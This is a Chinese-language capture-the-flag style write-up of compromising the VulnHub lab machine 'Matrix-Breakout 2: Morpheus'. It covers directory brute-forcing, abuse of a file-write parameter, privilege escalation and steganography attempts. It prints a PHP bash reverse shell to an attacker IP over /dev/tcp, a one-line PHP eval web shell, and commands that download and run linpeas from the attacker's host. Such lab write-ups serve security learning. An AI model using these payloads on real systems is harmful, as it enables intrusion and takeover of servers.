vulnhub靶场渗透实战15-matrix-breakout-2-morpheus
靶机搭建:vulnhub上是说vbox里更合适。可能有vbox版本兼容问题,我用的vmware导入。
靶场下载地址:https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova
网络模式:桥接。
一:信息收集
2;访问端口信息。三位一体不会玩。
3;目录爆破一下,继续寻找。
4;文件爆破一下,
ffuf -u http://192.168.1.35/FUZZ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -c -ic -e .txt,.zip,.php,html
gobuster dir -u http://192.168.1.35 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.zip
5;输入消息的地方好像有bug。试试。发布的东西被记录到txt文件里了。
二:漏洞利用。
1;burp抓包看一下数据包,
这里是一个file变量,改变file变量可以直接对靶机文件修改,能随意创建文件。准备反弹shell。
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.34/8888 0>&1'"); ?>
2;监听成功。
3;发现一个txt的文件。提示,和一张图片。
www-data@morpheus:/$ ls -al
要找到cypher的密码!!
4;访问一下图片,把图片复制到kali里面去,可能藏着东西喔。
复制不了的,也可以下载。
wget http://192.168.1.35/.cypher-neo.png
binwalk -w cypher-neo.png
binwalk -e cypher-neo.png --run-as=root
换这个工具查看隐藏信息,然后提取出来,然后提示我们加--run-as=root,之后目录下会多个目录,
zlib这个提取不太会,就换个方式吧!等哪天有大佬从这儿解了,我再来更新学习吧!
https://www.cnblogs.com/ainsliaea/p/15780903.html
https://blog.csdn.net/qq_40574571/article/details/80164981
5:传信息收集的工具上去,
python3 -m http.server 8000
wget http://192.168.1.34:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
这里我们用这个:
到这的话我们就提权成功了。前面让我们找到cypher的密码,zlib不会提取,试试爆破!家目录下有个flag。
python3 -c 'import pty; pty.spawn("/bin/bash")' 把权限变成交互式shell。
没爆破出来!
也可以写个马,连接蚁剑看看文件里面有没有什么信息。
<?php eval(@$_POST['password']);?>

四:总结
1:目录扫描,多用几种工具,dirb、gobuster、dirsearch ,ffuf等。
2:写入shell:通过抓包写入反弹 shell,写一句话木马连接工具。
分类:
VulnHub靶场渗透实战
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· 阿里巴巴 QwQ-32B真的超越了 DeepSeek R-1吗?
· 【译】Visual Studio 中新的强大生产力特性
· 【设计模式】告别冗长if-else语句:使用策略模式优化代码结构
· 10年+ .NET Coder 心语 ── 封装的思维:从隐藏、稳定开始理解其本质意义